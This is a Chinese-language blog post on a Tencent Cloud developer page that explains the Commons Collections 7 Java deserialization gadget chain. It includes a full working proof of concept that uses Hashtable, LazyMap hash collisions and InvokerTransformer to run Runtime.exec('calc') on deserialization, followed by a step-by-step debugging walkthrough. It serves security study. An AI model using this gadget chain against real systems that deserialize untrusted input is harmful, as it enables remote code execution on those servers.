Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
文章/答案/技术大牛
发布
首页
学习
活动
专区
圈层
工具
返回腾讯云官网
社区首页 >专栏 >Java安全之Commons Collections7分析

Java安全之Commons Collections7分析

作者头像
全栈程序员站长
发布于 2021-04-07 03:40:21
发布于 2021-04-07 03:40:21
79200
代码可运行
举报
文章被收录于专栏:全栈程序员必看全栈程序员必看
运行总次数:0
代码可运行
关联问题
换一批

Java安全之Commons Collections7分析

0x00 前言

本文讲解的该链是原生ysoserial中的最后一条CC链,但是实际上并不是的。在后来随着后面各位大佬们挖掘利用链,CC8,9,10的链诞生,也被内置到ysoserial里面。在该链中其实和CC6也是类似,但是CC7利用链中是使用Hashtable作为反序列化的入口点。

0x01 POC分析

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
package com.test;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;

public class cc7 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {


            // Reusing transformer chain and LazyMap gadgets from previous payloads
            final String[] execArgs = new String[]{"calc"};

            final Transformer transformerChain = new ChainedTransformer(new Transformer[]{});

            final Transformer[] transformers = new Transformer[]{
                    new ConstantTransformer(Runtime.class),
                    new InvokerTransformer("getMethod",
                            new Class[]{String.class, Class[].class},
                            new Object[]{"getRuntime", new Class[0]}),
                    new InvokerTransformer("invoke",
                            new Class[]{Object.class, Object[].class},
                            new Object[]{null, new Object[0]}),
                    new InvokerTransformer("exec",
                            new Class[]{String.class},
                            execArgs),
                    new ConstantTransformer(1)};

            Map innerMap1 = new HashMap();
            Map innerMap2 = new HashMap();

            // Creating two LazyMaps with colliding hashes, in order to force element comparison during readObject
            Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);
            lazyMap1.put("yy", 1);

            Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);
            lazyMap2.put("zZ", 1);

            // Use the colliding Maps as keys in Hashtable
            Hashtable hashtable = new Hashtable();
            hashtable.put(lazyMap1, 1);
            hashtable.put(lazyMap2, 2);

        Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers");
        iTransformers.setAccessible(true);
        iTransformers.set(transformerChain,transformers);
//        Reflections.setFieldValue(transformerChain, "iTransformers", transformers);

            // Needed to ensure hash collision after previous manipulations
            lazyMap2.remove("yy");
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("test1.out"));
        objectOutputStream.writeObject(hashtable);
        objectOutputStream.close();

        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("test1.out"));
        objectInputStream.readObject();
//            return hashtable;
        }
    }

这里依旧是提取重要代码出来去做了一个简化。

抛去和前面重复的部分,下面分为三段代码去进行分析。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
			Map innerMap1 = new HashMap();
            Map innerMap2 = new HashMap();

            // Creating two LazyMaps with colliding hashes, in order to force element comparison during readObject
            Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);
            lazyMap1.put("yy", 1);

            Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);
            lazyMap2.put("zZ", 1);
			Hashtable hashtable = new Hashtable();
            hashtable.put(lazyMap1, 1);
            hashtable.put(lazyMap2, 2);

在这段代码中,实例化了两个 HashMap,并对两个 HashMap使用了LazyMaptransformerChain HashMap

绑定到一起。然后分别添加到 Hashtable中, 但是前面看到的都是使用一次,为什么这里需要重复2次重复的操作呢?

下面来分析一下。

HashtablereconstitutionPut方法是被遍历调用的,

第一次调用的时候,并不会走入到reconstitutionPut方法for循环里面,因为tab[index]的内容是空的,在下面会对tab[index]进行赋值。在第二次调用reconstitutionPut时,tab中才有内容,我们才有机会进入到这个for循环中,从而调用equals方法。这也是为什么要调用两次put的原因。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
 Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers");
        iTransformers.setAccessible(true);
        iTransformers.set(transformerChain,transformers);
		lazyMap2.remove("yy");

前面的三段代码其实就是为了防止在序列化的时候,本地进行命令执行,前面先定义好一个空的,后面再使用反射将他的iTransformers进行替换。

其实最主要的是后面的lazyMap2.remove这个步骤。至于为什么需要在最后面移除该值,其实在LazyMap的get方法里面就可以看到。

如果不移除该方法就会走不进该判断条件的代码块中。而后面也会再调用一次put方法。

0x02 POC调试

依旧是在readobjetc的复写点打一个断点,这里面用到的是Hashtablereadobjetc作为入口点。

在其中会调用到reconstitutionPut方法,跟进一下。

前面说过,第一遍调用的时候,tab[index]是为空的,需要跟进到第二步的执行里面去查看。

在第二遍执行的时候就会进行到for循环里面,并且调用到keyequals方法。跟进一下该方法。

AbstractMapDecoratorequals方法会去调用this.mapequals。跟进一下。

下面代码还会继续调用m.get方法,在这里的m为LazyMap对象。

在最后就来到了LazyMap.get这一步,其实就比较清晰了。后面的和前面分析的几条链都一样。这里就不做分析了。

0x03 结尾

分析完了这一系列的CC链,后面就打算分析Fastjson、shiro、weblogic等反序列化漏洞,再后面就是开始写反序列化工具集了。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020年11月20日,如有侵权请联系 cloudcommunity@tencent.com 删除
文件存储
hashmap

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

文件存储
hashmap
评论
登录后参与评论
暂无评论
登录 后参与评论
推荐阅读
编辑精选文章
换一批
万字详解高可用架构设计
1408
Go 开发者必备:Protocol Buffers 入门指南
684
10分钟带你彻底搞懂分布式链路跟踪
358
多租户的 4 种常用方案
796
亿级月活的社交 APP,陌陌如何做到 3 分钟定位故障?
600
60页PPT全解:DeepSeek系列论文技术要点整理
1267
Java CC1反序列化链分析
java对象漏洞数组序列化
这里创建了个Transformer类型的数组,其中创建了四个对象,这四个对象分别使用了ConstantTransformer和InvokerTransformer两个类。
yulate
2023/05/02
7250
Java CC1反序列化链分析
Java安全之Commons Collections4-7分析
java
CC4分析 import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import javassist.*; import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4
红队蓝军
2022/05/17
1960
Java安全之Commons Collections4-7分析
Java安全之Commons Collections4-7分析
windows网络安全java
CC4分析 import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import javassist.*; import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections
红队蓝军
2022/03/14
3180
Java安全之Commons Collections4-7分析
Java安全之Commons Collections1-3分析
java
CC1分析 POC: import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTrans
红队蓝军
2022/05/17
2130
Java安全之Commons Collections1-3分析
Apache-Commons-Collections 反序列化分析
文件存储cssandroidhashmapjava
我在网上找到了一则利用代码,虽然这个利用代码很粗浅,并没有CC链1的触发过程,但是对于这条链的原理还是可见一斑的。
ConsT27
2022/03/15
9650
Apache-Commons-Collections 反序列化分析
Java安全之CommonsCollections1链
java安全对象数组序列化
Apache Commons是Apache软件基金会的项目,Commons的目的是提供可重用的、解决各种实际的通用问题且开源的 Java 代码。Apache Commons Collections 是对 java.util.Collection 的扩展,在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。让我们在开发应用程序的过程中,既保证了性能,同时也能大大简化代码。它增加了各异的集合和Map,常见的有FixedSizeList、SetUniqueList、TransformedList、PredicatedList、ListOrderedSet、Bag等集合拓展和TransformedMap、CaseInsensitiveMap、OrderedMap、LinkedMap、BidiMap、LazyMap等Map拓展。
ph0ebus
2023/05/16
4490
CommonsCollections6 反序列化链分析
javaimportkey对象序列化
CC6该条链用于解决在java高版本(java 8u71)中CC1无法利用进行替代的链,在java 8u71之后sun.reflect.annotation.AnnotationInvocationHandler#readObject的逻辑发生变化,导致cc1的链子在8u71之后无法使用。
yulate
2023/05/02
2740
CommonsCollections6 反序列化链分析
Java安全之CommonsCollections6链
java安全对象数组序列化
在8u71后不再直接使用反序列化得到的Map对象,而是新建了一个LinkedHashMap对象,并将原来的键值添加进去。 所以后续对Map的操作都是基于这个新的LinkedHashMap对象,而原来我们精心构造的 Map 不再执行 set 或 put 操作,也就不会触发RCE了
ph0ebus
2023/05/16
2390
java反序列化(三)CommonsCollections篇 — CC1
javaclassobject函数序列化
Commons Collections的利用链也被称为cc链,在学习反序列化漏洞必不可少的一个部分。Apache Commons Collections是Java中应用广泛的一个库,包括Weblogic、JBoss、WebSphere、Jenkins等知名大型Java应用都使用了这个库。
h0cksr
2023/05/17
3150
java反序列化(三)CommonsCollections篇 — CC1
Java安全之其他CC链
java安全对象反射序列化
cc3引入了InstantiateTransformer类替换了InvokerTransformer对cc1链进行变形绕过过滤。同理,cc2也能做同样的变形形成一条新的利用链,这就是cc4链。cc4相对于cc2来说并没有将TemplatesImpl类的实例直接放入队列
ph0ebus
2023/05/16
4540
yso!cc6链学习
cssjava编程算法hashmap文件存储
最近想起来学习java,看了下p神的java漫谈(十二),于是也跟着审了一下yso!cc6的链。
HhhM
2022/08/10
4160
yso!cc6链学习
Java安全之Commons Collections1-3分析
windows网络安全java
CC1分析 POC: import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTran
红队蓝军
2022/03/11
4000
Java安全之Commons Collections1-3分析
java反序列化(五)CommonsCollections篇 — CC3
javaclass对象函数序列化
CC3怎么说呢嗯嗯嗯,,,,,感觉和CC1区别不是很大,最大的不同点在于CC3是通过动态加载类之后将类实例化导致代码执行
h0cksr
2023/05/17
3180
java反序列化(五)CommonsCollections篇 — CC3
Java安全-反序列化-3-CC1
androidjavahttpcss文件存储
如果想劫持一个对象内部的方法调用,需要用到java.reflect.Proxy#newProxyInstance
Naraku
2022/04/17
4210
Java安全-反序列化-3-CC1
代码审计 | 命令注入和代码注入
apache安全文件存储https网络安全
在开发过程中,开发人员可能需要对系统文件进行移动、删除或者执行一些系统命令,这时如果执行的命令用户可控,就会导致命令执行漏洞。
TeamsSix
2022/09/20
1.4K0
代码审计 | 命令注入和代码注入
探究CC链的前置知识
mapobject变量函数接口
这里是各种探究CC链的过程中使用到的类的详细讲解,一边探究CC链一边把Gadget chain出现的类补进来 …..
h0cksr
2023/05/17
2110
Java安全-反序列化-4-CC6
文件存储编程算法hashmapjavaandroid
上一篇文章中通过AnnotationInvocationHandler#invoke方法来触发LazyMap#get方法,而AnnotationInvocationHandler这个类在高版本Java(8u71以后)进行了修改,导致该利用链无法利用。 这里讲另一个相对比较通用的Gadget:CommonCollections6,这个Gadget使用了另一个类org.apache.commons.collections.keyvalue.TiedMapEntry,该类在其hashCode方法中调用了getValue,而在getValue中调用了this.map.get,即可以调用LazyMap#get方法。
Naraku
2022/04/26
5100
Java安全-反序列化-4-CC6
Java安全-反序列化-2-CC
文件存储hashmapjavaandroid网络安全
TransformedMap,⽤于对Map类型的对象做修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。 如下,传入变量innerMap,返回outerMap。outerMap在添加新元素时,keyTransformer是处理新元素的Key的回调,valueTransformer是处理新元素的Value的回调,处理后得到的返回值才会被添加进outerMap中
Naraku
2022/04/14
3470
Java安全-反序列化-2-CC
RMI攻击Registry的两种方式
文件存储hashmap
RMI(Remote Method Invocation) :远程方法调用。它使客户机上运行的程序可以通过网络实现调用远程服务器上的对象,要实现RMI,客户端和服务端需要共享同一个接口。
FB客服
2022/11/14
4410
RMI攻击Registry的两种方式
Java安全之CommonsCollections3链
java安全classimport对象
CC3这条链比较特殊,和CC1与CC6这两条链是直接在链的代码中执行任意代码相比,CC3是通过动态类加载机制来实现自动执行恶意类的代码的。因此需要先学习一下 Java 动态类加载机制
ph0ebus
2023/05/16
4340
推荐阅读
编辑精选文章
万字详解高可用架构设计Go 开发者必备:Protocol Buffers 入门指南10分钟带你彻底搞懂分布式链路跟踪
相关讨论
ClassNotFound:commons.codec.digest.HmacUtils?关于视频服务流量消耗之问题。?猫之印媒体发稿靠谱吗?
相关课程
Java腾讯云WeData大数据开发与治理训练营AI驱动的TDSQL-Cserverless实战营
Java CC1反序列化链分析
7250
Java安全之Commons Collections4-7分析
1960
Java安全之Commons Collections4-7分析
3180
Java安全之Commons Collections1-3分析
2130
Apache-Commons-Collections 反序列化分析
9650
Java安全之CommonsCollections1链
4490
CommonsCollections6 反序列化链分析
2740
Java安全之CommonsCollections6链
2390
java反序列化(三)CommonsCollections篇 — CC1
3150
Java安全之其他CC链
4540
yso!cc6链学习
4160
Java安全之Commons Collections1-3分析
4000
java反序列化(五)CommonsCollections篇 — CC3
3180
Java安全-反序列化-3-CC1
4210
代码审计 | 命令注入和代码注入
1.4K0
探究CC链的前置知识
2110
Java安全-反序列化-4-CC6
5100
Java安全-反序列化-2-CC
3470
RMI攻击Registry的两种方式
4410
Java安全之CommonsCollections3链
4340
相关推荐
Java CC1反序列化链分析
更多 >
全栈程序员站长0
LV.1
CTO
文章
55K
获赞
121.5K
专栏
2
作者相关精选
换一批
加入讨论
的问答专区 >
派大星的数据屋0
1高级数据分析师擅长5个领域
相关课程
一站式学习中心 >
Java
1871人在学
java
腾讯云WeData大数据开发与治理训练营
1420人在学
数据开发治理平台 WeData
AI驱动的TDSQL-Cserverless实战营
1413人在学
云原生数据库 TDSQL-C
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2025 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论
5
目录
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验